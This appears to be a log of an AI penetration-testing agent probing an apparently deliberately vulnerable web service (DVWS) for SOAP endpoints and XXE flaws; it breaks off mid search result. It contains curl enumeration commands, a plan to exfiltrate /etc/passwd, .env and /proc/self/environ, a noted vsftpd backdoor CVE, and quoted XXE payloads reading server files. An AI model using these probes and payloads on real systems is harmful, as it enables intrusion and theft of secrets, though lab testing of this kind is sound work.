'tech_version': None}, {'domain': 'devergolabs.com', 'subdomain': 'gpigs.devergolabs.com', 'subdomain_status': '200', 'ip': '15.160.68.117', 'country': None, 'port': 8080, 'protocol': 'tcp', 'port_state': 'open', 'service': 'http-proxy', 'service_product': 'Apache Tomcat', 'service_version': '8.5.19', 'base_url': 'http://gpigs.devergolabs.com:8080', 'http_status': 200, 'page_title': 'Apache Tomcat/8.5.19', 'endpoint_path': '/&gt', 'method': 'GET', 'technology': None, 'tech_version': None}, {'domain': 'devergolabs.com', 'subdomain': 'gpigs.devergolabs.com', 'subdomain_status': '200', 'ip': '15.160.68.117', 'country': None, 'port': 8080, 'protocol': 'tcp', 'port_state': 'open', 'service': 'http-proxy', 'service_product': 'Apache Tomcat', 'service_version': '8.5.19', 'base_url': 'http://gpigs.devergolabs.com:8080', 'http_status': 200, 'page_title': 'Apache Tomcat/8.5.19', 'endpoint_path': '/docs/', 'method': 'GET', 'technology': None, 'tech_version': None}, {'domain': 'devergolabs.com', 'subdomain': 'gpigs.devergolabs.com', 'subdomain_status': '200', 'ip': '15.160.68.117', 'country': None, 'port': 8080, 'protocol': 'tcp', 'port_state': 'open', 'service': 'http-proxy', 'service_product': 'Apache Tomcat', 'service_version': '8.5.19', 'base_url': 'http://gpigs.devergolabs.com:8080', 'http_status': 200, 'page_title': 'Apache Tomcat/8.5.19', 'endpoint_path': '/docs/8080/DBTest/test.jsp', 'method': 'GET', 'technology': None, 'tech_version': None}, {'domain': 'devergolabs.com', 'subdomain': 'gpigs.devergolabs.com', 'subdomain_status': '200', 'ip': '15.160.68.117', 'country': None, 'port': 8080, 'protocol': 'tcp', 'port_state': 'open', 'service': 'http-proxy', 'service_product': 'Apache Tomcat', 'service_version': '8.5.19', 'base_url': 'http://gpigs.devergolabs.com:8080', 'http_status': 200, 'page_title': 'Apache Tomcat/8.5.19', 'endpoint_path': '/docs/aio.html', 'method': 'GET', 'technology': None, 'tech_version': None}, {'domain': 'devergolabs.com', 'subdomain': 'gpigs.devergolabs.com', 'subdomain_status': '200', 'ip': '15.160.68.117', 'country': None, 'port': 8080, 'protocol': 'tcp', 'port_state': 'open', 'service': 'http-proxy', 'service_product': 'Apache Tomcat', 'service_version': '8.5.19', 'base_url': 'http://gpigs.devergolabs.com:8080', 'http_status': 200, 'page_title': 'Apache Tomcat/8.5.19', 'endpoint_path': '/docs/api/index.html', 'method': 'GET', 'technology': None, 'tech_version': None}, {'domain': 'devergolabs.com', 'subdomain': 'gpigs.devergolabs.com', 'subdomain_status': '200', 'ip': '15.160.68.117', 'country': None, 'port': 8080, 'protocol': 'tcp', 'port_state': 'open', 'service': 'http-proxy', 'service_product': 'Apache Tomcat', 'service_version': '8.5.19', 'base_url': 'http://gpigs.devergolabs.com:8080', 'http_status': 200, 'page_title': 'Apache Tomcat/8.5.19', 'endpoint_path': '/docs/appdev/', 'method': 'GET', 'technology': None, 'tech_version': None}, {'domain': 'devergolabs.com', 'subdomain': 'gpigs.devergolabs.com', 'subdomain_status': '200', 'ip': '15.160.68.117', 'country': None, 'port': 8080, 'protocol': 'tcp', 'port_state': 'open', 'service': 'http-proxy', 'service_product': 'Apache Tomcat', 'service_version': '8.5.19', 'base_url': 'http://gpigs.devergolabs.com:8080', 'http_status': 200, 'page_title': 'Apache Tomcat/8.5.19', 'endpoint_path': '/docs/appdev/deployment.html', 'method': 'GET', 'technology': None, 'tech_version': None}, {'domain': 'devergolabs.com', 'subdomain': 'gpigs.devergolabs.com', 'subdomain_status': '200', 'ip': '15.160.68.117', 'country': None, 'port': 8080, 'protocol': 'tcp', 'port_state': 'open', 'service': 'http-proxy', 'service_product': 'Apache Tomcat', 'service_version': '8.5.19', 'base_url': 'http://gpigs.devergolabs.com:8080', 'http_status': 200, 'page_title': 'Apache Tomcat/8.5.19', 'endpoint_path': '/docs/appdev/index.html', 'method': 'GET', 'technology': None, 'tech_version': None}, {'domain': 'devergolabs.com', 'subdomain': 'gpigs.devergolabs.com', 'subdomain_status': '200', 'ip': '15.160.68.117', 'country': None, 'port': 8080, 'protocol': 'tcp', 'port_state': 'open', 'service': 'http-proxy', 'service_product': 'Apache Tomcat', 'service_version': '8.5.19', 'base_url': 'http://gpigs.devergolabs.com:8080', 'http_status': 200, 'page_title': 'Apache Tomcat/8.5.19', 'endpoint_path': '/docs/appdev/installation.html', 'method': 'GET', 'technology': None, 'tech_version': None}, {'domain': 'devergolabs.com', 'subdomain': 'gpigs.devergolabs.com', 'subdomain_status': '200', 'ip': '15.160.68.117', 'country': None, 'port': 8080, 'protocol': 'tcp', 'port_state': 'open', 'service': 'http-proxy', 'service_product': 'Apache Tomcat', 'service_version': '8.5.19', 'base_url': 'http://gpigs.devergolabs.com:8080', 'http_status': 200, 'page_title': 'Apache Tomcat/8.5.19', 'endpoint_path': '/docs/appdev/introduction.html', 'method': 'GET', 'technology': None, 'tech_version': None}, {'domain': 'devergolabs.com', 'subdomain': 'gpigs.devergolabs.com', 'subdomain_status': '200', 'ip': '15.160.68.117', 'country': None, 'port': 8080, 'protocol': 'tcp', 'port_state': 'open', 'service': 'http-proxy', 'service_product': 'Apache Tomcat', 'service_version': '8.5.19', 'base_url': 'http://gpigs.devergolabs.com:8080', 'http_status': 200, 'page_title': 'Apache Tomcat/8.5.19', 'endpoint_path': '/docs/appdev/processes.html', 'method': 'GET', 'technology': None, 'tech_version': None}, {'domain': 'devergolabs.com', 'subdomain': 'gpigs.devergolabs.com', 'subdomain_status': '200', 'ip': '15.160.68.117', 'country': None, 'port': 8080, 'protocol': 'tcp', 'port_state': 'open', 'service': 'http-proxy', 'service_product': 'Apache Tomcat', 'service_version': '8.5.19', 'base_url': 'http://gpigs.devergolabs.com:8080', 'http_status': 200, 'page_title': 'Apache Tomcat/8.5.19', 'endpoint_path': '/docs/appdev/sample/', 'method': 'GET', 'technology': None, 'tech_version': None}, {'domain': 'devergolabs.com', 'subdomain': 'gpigs.devergolabs.com', 'subdomain_status': '200', 'ip': '15.160.68.117', 'country': None, 'port': 8080, 'protocol': 'tcp', 'port_state': 'open', 'service': 'http-proxy', 'service_product': 'Apache Tomcat', 'service_version': '8.5.19', 'base_url': 'http://gpigs.devergolabs.com:8080', 'http_status': 200, 'page_title': 'Apache Tomcat/8.5.19', 'endpoint_path': '/docs/appdev/source.html', 'method': 'GET', 'technology': None, 'tech_version': None}, {'domain': 'devergolabs.com', 'subdomain': 'gpigs.devergolabs.com', 'subdomain_status': '200', 'ip': '15.160.68.117', 'country': None, 'port': 8080, 'protocol': 'tcp', 'port_state': 'open', 'service': 'http-proxy', 'service_product': 'Apache Tomcat', 'service_version': '8.5.19', 'base_url': 'http://gpigs.devergolabs.com:8080', 'http_status': 200, 'page_title': 'Apache Tomcat/8.5.19', 'endpoint_path': '/docs/apr.html', 'method': 'GET', 'technology': None, 'tech_version': None}, {'domain': 'devergolabs.com', 'subdomain': 'gpigs.devergolabs.com', 'subdomain_status': '200', 'ip': '15.160.68.117', 'country': None, 'port': 8080, 'protocol': 'tcp', 'port_state': 'open', 'service': 'http-proxy', 'service_product': 'Apache Tomcat', 'service_version': '8.5.19', 'base_url': 'http://gpigs.devergolabs.com:8080', 'http_status': 200, 'page_title': 'Apache Tomcat/8.5.19', 'endpoint_path': '/docs/architecture/index.html', 'method': 'GET', 'technology': None, 'tech_version': None}, {'domain': 'devergolabs.com', 'subdomain': 'gpigs.devergolabs.com', 'subdomain_status': '200', 'ip': '15.160.68.117', 'country': None, 'port': 8080, 'protocol': 'tcp', 'port_state': 'open', 'service': 'http-proxy', 'service_product': 'Apache Tomcat', 'service_version': '8.5.19', 'base_url': 'http://gpigs.devergolabs.com:8080', 'http_status': 200, 'page_title': 'Apache Tomcat/8.5.19', 'endpoint_path': '/docs/balancer-howto.html', 'method': 'GET', 'technology': None, 'tech_version': None}]

Analysis

The Neo4j graph contains comprehensive recon data for gpigs.devergolabs.com. The target is a Node.js Express application on port 80 with multiple API endpoints (v2 REST API with users, login, notes, info, upload). No SOAP/WSDL endpoints are currently known. FTP (vsftpd 2.3.4) and SSH are also open. The upload endpoints (/api/Upload, /api/upload) are particularly interesting as they may accept XML files which could be an XXE vector.

Actionable Findings

  • No SOAP/WSDL endpoints found in graph - need active enumeration
  • /api/upload and /api/Upload POST endpoints may accept XML files - potential XXE vector
  • /api/v2/info may reveal application details
  • vsftpd 2.3.4 on port 21 is a known vulnerable version (CVE-2011-2523 backdoor)

Recommended Next Steps

  • Probe common SOAP/WSDL paths on the Express app
  • Check /api/v2/info for application details
  • Test /api/upload with XML content to check for XXE
  • Fetch homepage to look for SOAP/WSDL references

Thinking 8:38:52 PM

The Neo4j graph query returned rich recon data. Let me analyze what we have:

Target: gpigs.devergolabs.com (15.160.68.117) Ports: 21 (FTP vsftpd 2.3.4), 22 (SSH OpenSSH 9.6p1), 80 (HTTP Node.js Express) Technologies: jQuery, Node.js, Express Known Endpoints:

  • / (GET)
  • /index.html (GET)
  • /api/Upload (POST)
  • /api/upload (POST, GET)
  • /api/v2/notes (GET)
  • /api/v2/info (GET)
  • /api/v2/users (POST, GET)
  • /api/v2/login (POST, GET)
  • /uploads (GET)
  • /static (GET)
  • /js, /css (GET)
  • /js/true/, /js/g, /js/binary/ (GET)

No SOAP/WSDL endpoints are visible in the graph. The objective is to find SOAP/WSDL endpoints for XXE. I need to:

  1. Check the root page and /api/v2/info for clues about SOAP endpoints
  2. Probe common SOAP/WSDL paths
  3. Also check if the /api/upload endpoint accepts XML (potential XXE vector via file upload)

Let me run multiple independent probes in parallel: fetch the root page, check /api/v2/info, and probe common SOAP/WSDL paths.

Reasoning

I need to discover SOAP/WSDL endpoints. The graph shows no SOAP endpoints, so I need to actively probe. I'll run multiple independent curl requests in parallel: one to get the homepage content, one to check /api/v2/info for app details, and I'll also probe common SOAP/WSDL paths. Using plan_tools to parallelize independent HTTP requests.

Todo List Update
  • [-] Query Neo4j for existing recon data on the target
  • HTTP GET on port 80 root to identify Express app and gather clues
  • Enumerate common SOAP/WSDL paths (/wsdl, /soap, /service, /ws, /?wsdl, etc.)
  • Directory brute-force for XML/SOAP/WSDL/API paths
  • Analyze discovered WSDL to understand SOAP envelope structure
  • Craft XXE payload in SOAP envelope to read /etc/passwd
  • Escalate XXE to read application source code
  • Exfiltrate environment files (.env, /proc/self/environ)

Wave — 3 tools 8:38:52 PM [OK]

These three probes are independent - fetching homepage, checking info API, and enumerating SOAP paths can all run in parallel to save iterations

Tool: execute_curl [OK]

Arguments

  • args: -s -v http://gpigs.devergolabs.com/
Raw Output 

<script src="./js/jquery.min.js"></script>
<script type="text/javascript" src="./js/angular.min.js"></script>
<link href="./css/bootstrap.min.css" rel="stylesheet" id="bootstrap-css">
<script src="./js/bootstrap.min.js"></script>
<link href="index.css" rel="stylesheet" id="inline-css">
<!------ Include the above in your HEAD tag ---------->

<div class="sidenav">
         <div class="login-main-text">
            <h2>Damn Vulnerable Web Services<br> Login Page</h2>
            <p>Login or register for Access</p>
         </div>
      </div>
      <div class="main">
         <div class="col-md-6 col-sm-12">
            <div class="login-form">
                    <div ng-app="app" ng-controller="MyController">
                            <p>Username: <input type="text" class="form-control" name="UserName" ng-model="username" required /></p>
                            <p>Password: <input type="text" class="form-control" name="Password" ng-model="password" required /></p>
                            <button class="btn btn-black" ng-click="SendData()">Login</button>
                            <button class="btn btn-secondary" ng-click="SendData2()">Register</button>
                            <hr />
                            <div ng-bind-html="DataResponse"></div>
                        </div>



            </div>
         </div>

      </div>


    <script type="text/javascript">
    var app = angular.module('app', []).config(function ($sceProvider) {
    $sceProvider.enabled(false);
});
    app.controller('MyController', function ($scope, $http, $window) {
        $scope.SendData = function () {
            var post = $http({
                method: "POST",
                url: "/api/v2/login",
                dataType: 'json',
                data: 'username=' + $scope.username +'&' + 'password=' + $scope.password,
                headers: {'Content-Type': 'application/x-www-form-urlencoded'}
            });
 
            post.then(function (response) {
                var data = response.data;
                if (data.status == 200) {
                $window.localStorage.setItem('JWTSessionID', data.token);
                window.location = "home.html#" + data.result.username;
                $scope.DataResponse = data.result.username;
                 }
            }, function (response) {
                var data = response.data;
                $scope.DataResponse = data.error;
            });
        }

        $scope.SendData2 = function () {
        var post = $http({
            method: "POST",
            url: "/api/v2/users",
            dataType: 'json',
            data: 'username=' + $scope.username +'&' + 'password=' + $scope.password,
            headers: {'Content-Type': 'application/x-www-form-urlencoded'}
        });


        post.then(function (response) {
            var data = response.data;
            if (data.status == 201) {
            $scope.DataResponse = data.user + ' created successfully!';
             } else if (data.status == 409) {
            $scope.DataResponse = data;
             }
        }, function (response) {
            var data = response.data;
                $scope.DataResponse = data;
            });
        }

    });

 </script>

[STDERR]: * Host gpigs.devergolabs.com:80 was resolved.
* IPv6: (none)
* IPv4: 15.160.68.117
*   Trying 15.160.68.117:80...
* Established connection to gpigs.devergolabs.com (15.160.68.117 port 80) from 172.24.0.2 port 57870 
* using HTTP/1.x
> GET / HTTP/1.1
> Host: gpigs.devergolabs.com
> User-Agent: curl/8.19.0
> Accept: */*
> 
* Request completely sent off
< HTTP/1.1 200 OK
< X-Powered-By: Express
< Accept-Ranges: bytes
< Cache-Control: public, max-age=0
< Last-Modified: Sun, 29 Mar 2026 15:16:07 GMT
< ETag: W/"cad-19d3a2aa6d8"
< Content-Type: text/html; charset=UTF-8
< Content-Length: 3245
< Date: Mon, 30 Mar 2026 18:38:52 GMT
< Connection: keep-alive
< Keep-Alive: timeout=5
< 
{ [3245 bytes data]
* Connection #0 to host gpigs.devergolabs.com:80 left intact

Tool: execute_curl [OK]

Arguments

  • args: -s -v http://gpigs.devergolabs.com/api/v2/info
Raw Output 
{"error":"Forbidden"}
[STDERR]: * Host gpigs.devergolabs.com:80 was resolved.
* IPv6: (none)
* IPv4: 15.160.68.117
*   Trying 15.160.68.117:80...
* Established connection to gpigs.devergolabs.com (15.160.68.117 port 80) from 172.24.0.2 port 57846 
* using HTTP/1.x
> GET /api/v2/info HTTP/1.1
> Host: gpigs.devergolabs.com
> User-Agent: curl/8.19.0
> Accept: */*
> 
* Request completely sent off
< HTTP/1.1 403 Forbidden
< X-Powered-By: Express
< Vary: Origin
< Access-Control-Allow-Credentials: true
< Content-Type: application/json; charset=utf-8
< Content-Length: 21
< ETag: W/"15-TLNzmZqKxaTuFdX/dVWWPBu44/c"
< Date: Mon, 30 Mar 2026 18:38:52 GMT
< Connection: keep-alive
< Keep-Alive: timeout=5
< 
{ [21 bytes data]
* Connection #0 to host gpigs.devergolabs.com:80 left intact

Tool: kali_shell [OK]

Arguments

  • command: for path in /wsdl /soap /service /ws /api/soap /api/wsdl /api/ws /api/service '/service?wsdl' '/?wsdl' '/soap?wsdl' '/ws?wsdl' /api/v2/soap /api/v2/wsdl /api/v2/ws /api/v2/service /xml /api/xml /api/v2/xml; do code=$(curl -s -o /dev/null -w '%{http_code}' "http://gpigs.devergolabs.com${path}"); echo "$path -> $code"; done
Raw Output 
/wsdl -> 404
/soap -> 404
/service -> 404
/ws -> 404
/api/soap -> 404
/api/wsdl -> 404
/api/ws -> 404
/api/service -> 404
/service?wsdl -> 404
/?wsdl -> 200
/soap?wsdl -> 404
/ws?wsdl -> 404
/api/v2/soap -> 404
/api/v2/wsdl -> 404
/api/v2/ws -> 404
/api/v2/service -> 404
/xml -> 404
/api/xml -> 404
/api/v2/xml -> 404

Analysis

The target is running 'Damn Vulnerable Web Services' (DVWS) - a deliberately vulnerable Express/Node.js application with AngularJS frontend. The root page is a login/register form using JWT authentication. The /api/v2/info endpoint requires authentication (403). Most critically, /?wsdl returns HTTP 200, indicating a WSDL/SOAP service is available at the root. All other SOAP/WSDL paths returned 404, so this is the primary SOAP endpoint.

Actionable Findings

  • /?wsdl returns HTTP 200 - WSDL service descriptor available
  • Application is DVWS (Damn Vulnerable Web Services) - intentionally vulnerable
  • AngularJS SCE is disabled ($sceProvider.enabled(false)) - potential XSS vector
  • /api/v2/info requires JWT authentication (403 Forbidden)
  • Login endpoint: POST /api/v2/login with form-urlencoded username/password
  • Register endpoint: POST /api/v2/users with form-urlencoded username/password

Recommended Next Steps

  • Fetch WSDL content from /?wsdl to understand SOAP service structure
  • Analyze SOAP operations and craft XXE payload in SOAP envelope
  • Test XXE to read /etc/passwd

Thinking 8:39:19 PM

Analyzing all three tool outputs together:

  1. Root page (/): This is 'Damn Vulnerable Web Services' (DVWS) - a deliberately vulnerable application. It's an AngularJS app with Express backend. Login uses /api/v2/login with form-urlencoded data. Register uses /api/v2/users. SCE is disabled in Angular which is interesting but not our focus.

  2. /api/v2/info: Returns 403 Forbidden - needs authentication (JWT token based on the login flow storing 'JWTSessionID').

  3. SOAP/WSDL enumeration: Most paths return 404, BUT /?wsdl returns 200! This is a critical finding - there's a WSDL endpoint at the root with ?wsdl parameter.

Next step: Fetch the WSDL content from /?wsdl to understand the SOAP service structure, operations, and namespaces. This will tell us how to craft a proper SOAP envelope for XXE injection.

Reasoning

The /?wsdl endpoint returned HTTP 200, which means there's a WSDL service descriptor available. I need to fetch its content to understand the SOAP operations and XML structure expected by the service. This is essential before crafting an XXE payload - I need to know the correct namespace, operation name, and parameter structure to embed the XXE entity in a valid SOAP envelope.

Todo List Update
  • Query Neo4j for existing recon data on the target
  • [-] HTTP GET on port 80 root to identify Express app and gather clues
  • [-] Enumerate common SOAP/WSDL paths (/wsdl, /soap, /service, /ws, /?wsdl, etc.)
  • [-] Check /api/v2/info for application details and SOAP references
  • Test /api/upload with XML Content-Type to check for XXE processing
  • Analyze discovered WSDL to understand SOAP envelope structure
  • Craft XXE payload in SOAP envelope to read /etc/passwd
  • Escalate XXE to read application source code
  • Exfiltrate environment files (.env, /proc/self/environ)

Tool: execute_curl 8:39:19 PM [OK]

Arguments

  • args: -s http://gpigs.devergolabs.com/?wsdl
Raw Output 

<script src="./js/jquery.min.js"></script>
<script type="text/javascript" src="./js/angular.min.js"></script>
<link href="./css/bootstrap.min.css" rel="stylesheet" id="bootstrap-css">
<script src="./js/bootstrap.min.js"></script>
<link href="index.css" rel="stylesheet" id="inline-css">
<!------ Include the above in your HEAD tag ---------->

<div class="sidenav">
         <div class="login-main-text">
            <h2>Damn Vulnerable Web Services<br> Login Page</h2>
            <p>Login or register for Access</p>
         </div>
      </div>
      <div class="main">
         <div class="col-md-6 col-sm-12">
            <div class="login-form">
                    <div ng-app="app" ng-controller="MyController">
                            <p>Username: <input type="text" class="form-control" name="UserName" ng-model="username" required /></p>
                            <p>Password: <input type="text" class="form-control" name="Password" ng-model="password" required /></p>
                            <button class="btn btn-black" ng-click="SendData()">Login</button>
                            <button class="btn btn-secondary" ng-click="SendData2()">Register</button>
                            <hr />
                            <div ng-bind-html="DataResponse"></div>
                        </div>



            </div>
         </div>

      </div>


    <script type="text/javascript">
    var app = angular.module('app', []).config(function ($sceProvider) {
    $sceProvider.enabled(false);
});
    app.controller('MyController', function ($scope, $http, $window) {
        $scope.SendData = function () {
            var post = $http({
                method: "POST",
                url: "/api/v2/login",
                dataType: 'json',
                data: 'username=' + $scope.username +'&' + 'password=' + $scope.password,
                headers: {'Content-Type': 'application/x-www-form-urlencoded'}
            });
 
            post.then(function (response) {
                var data = response.data;
                if (data.status == 200) {
                $window.localStorage.setItem('JWTSessionID', data.token);
                window.location = "home.html#" + data.result.username;
                $scope.DataResponse = data.result.username;
                 }
            }, function (response) {
                var data = response.data;
                $scope.DataResponse = data.error;
            });
        }

        $scope.SendData2 = function () {
        var post = $http({
            method: "POST",
            url: "/api/v2/users",
            dataType: 'json',
            data: 'username=' + $scope.username +'&' + 'password=' + $scope.password,
            headers: {'Content-Type': 'application/x-www-form-urlencoded'}
        });


        post.then(function (response) {
            var data = response.data;
            if (data.status == 201) {
            $scope.DataResponse = data.user + ' created successfully!';
             } else if (data.status == 409) {
            $scope.DataResponse = data;
             }
        }, function (response) {
            var data = response.data;
                $scope.DataResponse = data;
            });
        }

    });

 </script>

Analysis

The /?wsdl endpoint returned HTTP 200 but served the same AngularJS login page HTML - this is NOT a real WSDL document. The Express app is using SPA-style routing where unmatched routes return the index.html. The application is confirmed as DVWS (Damn Vulnerable Web Services) with JWT-based authentication, AngularJS frontend, and REST API at /api/v2/. Login is via POST to /api/v2/login and registration via POST to /api/v2/users.

Actionable Findings

  • /?wsdl is NOT a real WSDL endpoint - it's the SPA fallback returning the login page
  • Registration is open via POST /api/v2/users - we can create an account to access authenticated features
  • DVWS is a known vulnerable app - its SOAP/XXE endpoints are documented

Recommended Next Steps

  • Search for known DVWS SOAP/XXE endpoints
  • Check home.html for links to vulnerable features
  • Register an account to access authenticated endpoints
  • Enumerate more paths for SOAP/XML services

Thinking 8:39:50 PM

The /?wsdl endpoint returned the same login page HTML as the root - it's not actually serving a WSDL document. The Express app is likely serving the same index.html for all unmatched routes (SPA behavior). I need to look for the actual SOAP/WSDL endpoint elsewhere. DVWS (Damn Vulnerable Web Services) is a known deliberately vulnerable application - let me search for its known SOAP/XML endpoints. Common DVWS endpoints include /dvws/soap, /xmlservice, etc. I should also check if there's a separate SOAP service path, or if the XML processing happens through the existing /api endpoints. Let me also try sending XML content to the known endpoints like /api/upload and check the home.html page for SOAP-related functionality.

Reasoning

The /?wsdl path returned 200 but it's just the SPA fallback serving the login page. I need to find the actual SOAP endpoint. Since this is DVWS, I should search for known DVWS SOAP endpoints and also explore the authenticated portions of the app. Let me do a web search for DVWS SOAP endpoints and simultaneously check the home.html page which likely contains links to the vulnerable features.

Todo List Update
  • Query Neo4j for existing recon data on the target
  • HTTP GET on port 80 root to identify Express app and gather clues
  • Enumerate common SOAP/WSDL paths - found /?wsdl returns 200
  • Check /api/v2/info for application details - requires auth (403)
  • [-] Fetch WSDL content from /?wsdl to understand SOAP service structure
  • Analyze WSDL and craft XXE payload in SOAP envelope to read /etc/passwd
  • Test /api/upload with XML Content-Type for XXE processing
  • Escalate XXE to read application source code
  • Exfiltrate environment files (.env, /proc/self/environ)

Wave — 3 tools 8:39:50 PM [OK]

Three independent information gathering tasks: web search for known DVWS endpoints, fetching the home page for feature links, and enumerating additional paths. None depend on each other's output.

Tool: web_search [OK]

Arguments

  • query: DVWS Damn Vulnerable Web Services SOAP XXE endpoint Node.js Express
Raw Output 
{'query': 'DVWS Damn Vulnerable Web Services SOAP XXE endpoint Node.js Express', 'follow_up_questions': None, 'answer': None, 'images': [], 'results': [{'url': 'https://www.yeswehack.com/learn-bug-bounty/xml-external-entity-guide-xxe', 'title': 'The ultimate Bug Bounty guide to exploiting XXE ...', 'content': 'Legacy SOAP services are inherently XML-based. Many enterprise systems maintain SOAP endpoints for backward compatibility or integration with older systems, and these services parse XML with every request.\n SVG image processors parse Scalable Vector Graphics (SVG) as XML. Upload an avatar, submit a logo or process any SVG file and an XML parser is invoked. [...] ```\n\n1POST /users/update HTTP/1.1\n\n2Host: api.example.com\n\n3Content-Type: application/xml\n\n4\n\n5<?xml version="1.0" encoding="UTF-8"?>\n\n6<!DOCTYPE root [\n\n7<!ENTITY xxe SYSTEM "file:///etc/passwd">\n\n8]>\n\n9<root>\n\n10<username>john_doe</username>\n\n11<email>john@example.com</email>\n\n12<bio>&xxe;</bio>\n\n13</root>\n\n```\n\nIf the application’s backend framework (such as Spring, Laravel or Express) has XML parsing capabilities enabled, it may automatically deserialize your XML input. The parser resolves the `&xxe;` entity and suddenly you’re reading server files through an endpoint that “only accepts JSON”. [...] #### SVG images\n\n```\n\n1POST /api/avatar/upload HTTP/1.1\n\n2Host: example.com\n\n3Content-Type: image/svg+xml\n\n4\n\n5<?xml version="1.0" standalone="yes"?>\n\n6<!DOCTYPEsvg[\n\n7<!ENTITYxxe SYSTEM "file:///etc/hostname">\n\n8]>\n\n9<svg width="500" height="500" xmlns="\n\n10<text x="20" y="35" font-size="16">&xxe;</text>\n\n11</svg>\n\n```\n\nMany image processing libraries parse SVG as XML, making them vulnerable to XXE.\n\n#### SOAP endpoints\n\nSome REST APIs maintain legacy SOAP support. Try switching to SOAP format:\n\n```\n\n1POST /api/users HTTP/1.1\n\n2Host: example.com\n\n3Content-Type: text/xml\n\n4\n\n5<?xml version="1.0"?>\n\n6<!DOCTYPEsoap:Envelope[\n\n7<!ENTITYxxe SYSTEM "file:///etc/passwd">\n\n8]>\n\n9<soap:Envelope xmlns:soap="\n\n10<soap:Body>\n\n11<getUserInfo>&xxe;</getUserInfo>\n\n12</soap:Body>\n\n13</soap:Envelope>', 'score': 0.9978173, 'raw_content': None}, {'url': 'https://security.snyk.io/vuln/SNYK-JAVA-SOAP-3034822', 'title': 'XML External Entity (XXE) Injection in soap:soap', 'content': 'There is no fixed version for `soap:soap`.\n\n## Overview\n\nAffected versions of this package are vulnerable to XML External Entity (XXE) Injection through `RPCRouterServlet`, which allows the reading of arbitrary files over HTTP.\n\nNote: Apache recommends for affected users to migrate to one of the other actively maintained web service stacks such as `Apache CXF` () or `Apache Axis` ().\n\n## Details [...] ```\n xml version="1.0" encoding="ISO-8859-1"?? John  \n```\n\nAn external XML entity - `xxe`, is defined using a system identifier and present within a DOCTYPE header. These entities can access local or remote content. For example the below code contains an external XML entity that would fetch the content of `/etc/passwd` and display it to the user rendered by `username`.\n\n```\n xml version="1.0" encoding="ISO-8859-1"?? \n]> &xxe;  \n```\n\nOther XXE Injection attacks can access local resources that may not stop returning data, possibly impacting application availability and leading to Denial of Service.\n\n## References\n\n Apache Thread\n OSS Security Advisory\n\n### CVSS Base Scores\n\nversion 3.1\n\n### Snyk\n\n7.5 high\n\n Attack Vector (AV) [...] # XML External Entity (XXE) Injection Affecting soap:soap package, versions [2.2,]\n\n### Severity\n\n Recommended\n\nhigh\n\n0\n\n10\n\nCVSS assessment by Snyk\'s Security Team. Learn more\n\n### Threat Intelligence\n\nEPSS\n\nThe probability is the direct output of the EPSS model, and conveys an overall sense of the threat of exploitation in the wild. The percentile measures the EPSS probability relative to all known EPSS scores. Note: This data is updated daily, relying on the latest available EPSS model version. Check out the EPSS documentation for more details.\n\n0.3% (53rd percentile)\n\n### Do your applications use this vulnerable package?\n\nIn a few clicks we can analyze your entire application and see what components are vulnerable in your application, and suggest you quick fixes.', 'score': 0.9933589, 'raw_content': None}, {'url': 'https://github.com/snoopysecurity/dvws-node', 'title': 'snoopysecurity/dvws-node - GitHub', 'content': 'Insecure Direct Object Reference\n Horizontal Access Control Issues\n Vertical Access Control Issues\n Mass Assignment\n Cross-Site Scripting\n NoSQL Injection\n Server Side Request Forgery\n JSON Web Token (JWT) Secret Key Brute Force\n Information Disclosure\n Hidden API Functionality Exposure\n Cross-Origin Resource Sharing Misonfiguration\n JSON Hijacking\n SQL Injection\n XML External Entity Injection (XXE)\n Command Injection\n XPATH Injection\n XML-RPC User Enumeration\n Open Redirect\n Path Traversal\n Unsafe Deserialization\n Sensitive Data Exposure\n GraphQL Access Control Issues\n GraphQL Introspection Enabled\n GraphQL Arbitrary File Write\n GraphQL Batching Brute Force\n API Endpoint Brute Forcing\n CRLF Injection\n XML Injection\n XML Bomb Denial-of-Service\n SOAP Injection [...] ## Repository files navigation\n\nGitpod Ready-to-Code Node.js Version Docker Security\n\n# dvws-node\n\nDamn Vulnerable Web Services is a vulnerable application with a web service and an API that can be used to learn about webservices/API related vulnerabilities. This is a replacement for \n\nThis vulnerable application contains the following API/Web Service vulnerabilities: [...] ```\nnpm install --build-from-source \n```\n\nRun the startup script which create some test data\n\n```\nnode startup_script.js \n```\n\nTo start the application/API, run (sudo privileges is needed to bind to port 80, which is the default. You can change the port in `.env` to avoid using sudo).\n\n```\nsudo npm start \n```\n\nWithin your /etc/hosts file, ensure localhost resolves to dvws.local. This ensures URLs from swagger is resolved correctly (optional)\n\n```\n127.0.0.1 dvws.local \n```\n\n### Docker Compose\n\nIf you have docker compose installed on your system, all you need to execute is :\n\nClone DVWS\n\n```\ngit clone  \n```\n\nChange directory to dvws-node\n\n```\ncd dvws-node \n```\n\nStart Docker\n\n```\n`docker-compose up` \n```', 'score': 0.9923638, 'raw_content': None}, {'url': 'https://portswigger.net/web-security/xxe', 'title': 'XML external entity (XXE) injection', 'content': "## Finding hidden attack surface for XXE injection\n\nAttack surface for XXE injection vulnerabilities is obvious in many cases, because the application's normal HTTP traffic includes requests that contain data in XML format. In other cases, the attack surface is less visible. However, if you look in the right places, you will find XXE attack surface in requests that do not contain any XML.\n\n### XInclude attacks\n\nSome applications receive client-submitted data, embed it on the server-side into an XML document, and then parse the document. An example of this occurs when client-submitted data is placed into a back-end SOAP request, which is then processed by the backend SOAP service. [...] There are various types of XXE attacks:\n\n Exploiting XXE to retrieve files, where an external entity is defined containing the contents of a file, and returned in the application's response.\n Exploiting XXE to perform SSRF attacks, where an external entity is defined based on a URL to a back-end system.\n Exploiting blind XXE exfiltrate data out-of-band, where sensitive data is transmitted from the application server to a system that the attacker controls.\n Exploiting blind XXE to retrieve data via error messages, where the attacker can trigger a parsing error message containing sensitive data.\n\n## Exploiting XXE to retrieve files\n\nTo perform an XXE injection attack that retrieves an arbitrary file from the server's filesystem, you need to modify the submitted XML in two ways:", 'score': 0.95945925, 'raw_content': None}, {'url': 'https://github.com/appsecco/dvna', 'title': 'appsecco/dvna: Damn Vulnerable NodeJS Application - GitHub', 'content': '| server.js | | server.js |  |  |\n| startup.sh | | startup.sh |  |  |\n| wait-for-it.sh | | wait-for-it.sh |  |  |\n| View all files | | | [...] ## Latest commit\n\n## History\n\n## Repository files navigation\n\n# Damn Vulnerable NodeJS Application (DVNA)\n\ndvna-logo\n\ndvna-logo\n\nDamn Vulnerable NodeJS Application (DVNA) is a simple NodeJS application to demonstrate OWASP Top 10 Vulnerabilities and guide on fixing and avoiding these vulnerabilities. The fixes branch will contain fixes for the vulnerabilities. Fixes for vulnerabilities OWASssP Top 10 2017 vulnerabilities at fixes-2017 branch.\n\nThe 